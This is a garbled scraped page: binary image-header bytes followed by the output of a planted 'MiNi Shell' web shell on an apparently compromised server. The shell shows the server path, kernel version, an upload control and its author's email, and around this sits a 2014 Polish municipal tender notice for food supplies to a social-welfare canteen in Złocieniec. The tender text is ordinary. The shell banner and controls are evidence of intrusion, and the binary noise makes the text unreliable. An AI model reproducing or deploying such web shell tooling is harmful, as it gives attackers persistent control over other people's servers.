JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/55225-N-2014.html

<p class="kh_header"><b>Złocieniec: Dostawa żywności do stołówki MGOPS w Złocieńcu w 2014r. w podziale na zadania częściowe</b><br>
<b>Numer ogłoszenia: 55225 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , Plac 650-lecia 1, 78-520 Złocieniec, woj. zachodniopomorskie, tel. 94 3671248, faks 94 3672767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> htpp://mgops.zlocieniec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności do stołówki MGOPS w Złocieńcu w 2014r. w podziale na zadania częściowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> MIĘSO 
1      łopatka b/k	kg	1200
2	karkówka b/k	kg	160
3	szynka b/k	kg	120
4	schab b/k	kg	320
5	żeberka wieprzowe	kg	200
6	słonina	kg	400
7	smalec 200g	szt	400
8	smalec 115g	szt	2200

WĘDLINA
boczek wędzony	kg	450
kiełbasy różne	kg	880
kiełbasa pomorska	kg	89
kiełbasa biała	kg	200
kaszanka	kg	220
łopatka wędzona	kg	89
martadela	kg	94
mielonka wieprzowa	kg	250
ogonówka parzona	kg	60
pieczeń wieprzowa	kg	200
parówka wieprzowa	kg	150
polędwica sopocka	kg	100
blok szynkowy	kg	100
szynka królewska	kg	200

DRÓB
piersi drobiowe	kg	460
skrzydełka drobiowe	kg	100
wątróbka drobiowa	kg	80
udka kurczaka extra	kg	200
filet zapiekany z indyka	kg	100
filet drobiowy	kg	30
kurczak po zboju	kg	28
medaliony drobiowe	kg	130
parówka drobiowa	kg	350
polędwicz drobiowa	kg	120
skrzydełka wędzone	kg	100
pasta drobiowa do kanapek	szt	540
pasztet drobiowy 80g	szt	270
pasztet drobiowy 300g	szt	3200

KONSERWY MIĘSNE
1	flaki 500g	szt	1570
2	głowizna 500g	szt	280
3	konserwa mięsna SYTA 300g	szt	1200
4	konserwa przysmak 300g	szt	680
5	konserwa turystyczna 300g	szt	1100
6	konserwa Lunch Meat 300g	szt	420
7	konserwa mięsna KROTUM 110g	szt	1000
8	konserwa 500 (pulpety, klopsy, gołąbki)	szt	3900
9	konserwa mięsna 300g	szt	3200
10	konserwa szynka 155g	szt	750
11	leczo z kiełbasą 500g	szt	280
12	pasztet wieprzowy /drobiowy 131g	szt	1650
13	pasztet wieprz. 195g. +100%gratis	szt	500
14	paprykarz 300g	szt	3000

ARTYKUŁY SPOŻYWCZE
1	biały barszcz 65g	szt	               350    
2	żurek 49g	szt	               400    
3	bułka tarta 	kg	               100    
4	bazylia 10g	szt	                 20    
5	chrzan tarty 270g	szt	                 50    
6	degusta 200g	szt	               100    
7	fasolka kon. 470g	szt	               200    
8	groszek kon. 400g	szt	                 60    
9	kminek 20g	szt	                 20    
10	kwasek cytrynowy 20g	szt	               140    
11	koncentrant pomid. 4550g	szt	                 50    
12	kukurydza 400g	szt	                 30    
13	liść laurowy 6g	szt	                 80    
14	musztarda 190g	szt	                 32    
15	majeranek 7g	szt	               260    
16	ogórki konserwowe 0,9	szt	               320    
17	olej 1l	szt	               300    
18	ocet 0,5l	szt	                 50    
19	oregano 10g	szt	                 50    
20	pieprz mielony 20g	szt	               400    
21	pieprz ziołowy 20g	szt	               300    
22	makaron świderki 1kg	szt	               800    
23	 mąka ziemniaczana 500g 	szt	           30,00    
24	mąka koszalińska	kg	               370    
25	kasza jęczmienna 1kg	szt	               350    
26	cukier	kg	               100    
 27	ryż długoziarnisty	kg	               370    
 28	sól	kg	               600    
 29	papryka mielona 20g	szt	               120    
 30	przyprawa prowansalska 10g	szt	                 20    
 31	przyprawa do kurczaka 50g	szt	                 10    
 32	papryka konserwowa 4250g	szt	                 10    
 33	przecier ogórkowy 0,9	szt	               100    
 34	syropy owocowe 335g	szt	           1 200    
 35	sos boloński 42g	szt	               100    
 36	sos pieczeniowy 30g	szt	               250    
 37	szczaw kon. 0,9	szt	               100    
 38	tymianek 10g	szt	                 20    
 39	ziele angielskie 15g	szt	                 60    
 40	zupa ogonowa 41g	szt	               100    
 41	maggi 760g	szt	                 90

WARZYWA
1	buraki	kg	               800    
2	czosnek	szt	               200    
3	cebula	kg	               800    
4	fasola luz	kg	               330    
5	groch łuskany luz	kg	               210    
6	jabłka	kg	                 10    
7	kapusta biała	kg	           1 200    
8	kapusta czerwona	kg	               200    
9	kapusta pekińska	kg	                 60    
10	kalafior	szt	               200    
11	kapusta włoska	kg	                 50    
12	marchew	kg	           1 200    
13	ogórki świeże	kg	                 70    
 14	pietruszka	kg	               300    
 15	por	kg	               400    
 16	papryka świeża	kg	                 10    
 17	kapusta kw.	kg	               850    
 18	ogórki kw.	kg	               564    
 19	pomidor	kg	                 50    
 20	pieczarki	kg	               300    
 21	rzepa czarna	kg	               100    
 22	szczypior	kg	                 30    
 23	seler	kg	               300    
 24	ziemniaki jadalne stare 	kg	         16 000    
 25	ziemniaki jadalne młode 	kg	           2 000    

PIECZYWO
1	chleb pszenny 600g	szt	         18 700    

RYBY
1	filet z miruny	kg	               120    
2	matiasy sledziowe	kg	               150    
3	kostka panierowana 	kg	               200    
4	burgery rybne	kg	                 42    
5	kotlety rybne z warzywami	kg	                 37    
6	sałatki rybne 150g	szt	               750    
7	sałatka rybna 130g	szt	               750    
8	konserwa rybna 160g	szt	           1 800    

JAJA
1	jaja 60-65g	szt	           6 600    

 
3.1.8. Zadanie częściowe nr 8   NABIAŁ
Lp.	Nazwa artykułu	jednostka miary	 szacunkowa ilość 
1	śmietana 400g 18%	szt	           1 900    
2	jogurty owocowe 125g	szt	           2 900    
3	dobry z masłem 200g	szt	           2 000    
4	margaryna 250g typu palma	szt	           1 000    
5	margaryna Marcysia 500g	szt	           4 000    
6	twaróg półtłusty	kg	               250    
7	serek topiony 100g kostka	szt	           4 000    
 8	serek topiony plastry 150g	szt	           1 600    
9	serek topiony kiełbaski 100g	szt	           1 700.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.11.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wnoszenia wadium przez wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  tym zakresie zamawiający nie wymaga  od wykonawcy spełnienia warunków szczegółowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  tym zakresie zamawiający nie wymaga  od wykonawcy spełnienia warunków szczegółowych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  tym zakresie  zamawiający  nie wymaga od wykonawcy spełnienia warunków szczegółowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie  zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  tym zakresie zamawiający nie  wymaga od wykonawcy spełnienia warunków szczegółowych .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> htp://mgops.zlocieniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko Gminny Ośrodek Pomocy Społecznej
78-520 Złocieniec
ul. Plac 650-Lecia 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2014 godzina 12:00, miejsce: MGOPS w Złocieńcu, 
ul. Plac 650 Lecia 1  
w sekretariacie MGOPS pokój 206.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com